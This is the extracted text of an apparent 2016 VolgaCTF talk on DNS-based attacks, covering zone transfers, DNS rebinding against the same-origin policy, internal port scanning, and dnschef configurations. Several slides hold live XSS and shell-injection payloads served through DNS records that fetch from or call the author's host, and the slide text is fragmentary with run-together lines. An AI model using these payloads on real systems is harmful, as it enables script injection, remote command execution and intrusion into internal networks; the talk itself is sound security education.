VolgaCTF | Bo0oM - DNS and attacks

2016

DNSand attacks

What is DNS?

The Domain Name System (DNS) is a hierarchical decentralized naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates more readily memorized domain names to the numerical IP addresses needed for the purpose of locating and identifying computer services and devices with the underlying network protocols. By providing a worldwide, distributed directory service, the Domain Name System is an essential component of the functionality of the Internet.

213.180.204.3 mycomputer.arpa173.194.32.169 dennis.arpa87.240.165.87 newoffice.arpa173.252.89.132 test112210.28.114.254 it.chat.in-addr.arpa

Hosts.txt

A

KEY

DS

AAAA

DNSKEY

CNAME

MXNS PTR

SOA

TSIG

SRV

TXT

DNSand DDoS

dig -t axfr sitename.com

http://half-life.wikia.com/wiki/Half-Life_2_Betahttp://pixelsmashers.com/wordpress/?p=7866

DNSand SOP

What is SOP?

In computing, the same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page's Document Object Model.

Same-origin policy

A 97.246.251.93

A 192.168.0.1

evil.xxx:

https://crypto.stanford.edu/dns/dns-rebinding.pdfhttps://www.ptsecurity.com/download/DNS-rebinding.pdf

The resulting attack consists of the following steps: 1. The victim addresses the dns.evil.xxx domain.2. The attacker’s DNS server returns both IP addresses in the fixed order.3. The browser redirects the request to the server at the external 97.246.251.93 IP address.4. The server returns an HTML page containing JavaScript.5. After the browser downloads the page, the client’s JavaScript sends a request to the dns.evil.xxx domain.6. After the request is received, the server script blocks the incoming connections with the victim’s IP address.7. After a while, the client’s script re-addresses the dns.attacker.ru domain. Since the server returns RTS from the 97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1.

Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as process the received responses and send the results to the attacker..

DNSand ports

A 1.2.3.4

A 4.3.2.1

A 192.168.1.1

evil.xxx:

?

test.evil.xxx 192.168.1.1test.evil.xxx report1.hosttest2.evil.xxx 192.168.1.2test2.evil.xxx report2.hosttest3.evil.xxx 192.168.1.3test3.evil.xxx report3.hosttest4.evil.xxx 192.168.1.4test4.evil.xxx report4.host

cat /etc/hosts

?


cat /etc/hosts

192.168.1.3:3306 - open port

create page:<img src=”http://test.evil.xxx:3306”>


cat /etc/hoststest.evil.xxx (192.168.1.1) errtest.evil.xxx (report1.host) ok, redirect

test2.evil.xxx (192.168.1.2) errtest2.evil.xxx (report2.host) ok, redirect

test3.evil.xxx (192.168.1.2) ok!

test3.evil.xxx report3.host

DNSand DoS

ns.hack.bo0om.ru. 0 IN NSns.hack.bo0om.ru.

DNSand XSS

https://news.ycombinator.com/item?id=8336025http://www.serveradminblog.com/2014/09/xss-via-dns/

Dnschef

[NS] # Queries for mail server records*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>

[MX] # Queries for mail server records*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>

[CNAME] # Queries for alias records*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>

http://thesprawl.org/projects/dnschef/

DNSand RCE

RCE vectors& whoami

`whoami`

$(whoami)

‘&whoami

“&whoami

With $IFS set to default, a blank line displays

Dnschef[NS] # Queries for mail server records*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'

[MX] # Queries for mail server records*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'

[CNAME] # Queries for alias records*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'

DNSand SQLinj

DNSand SQLinj, OOB

DNSand SQLinj, OOB, DNS hijacking, DNS cache poisoning, DNS flood...

Anton “Bo0oM” Lopanitsyn

https://bo0om.ru

@i_bo0om

Questions?

https://bo0om.ru/

Date post:	09-Jan-2017
Category:	Technology
Upload:	-
View:	119 times
Download:	1 times

VolgaCTF | Bo0oM - DNS and attacks

Technology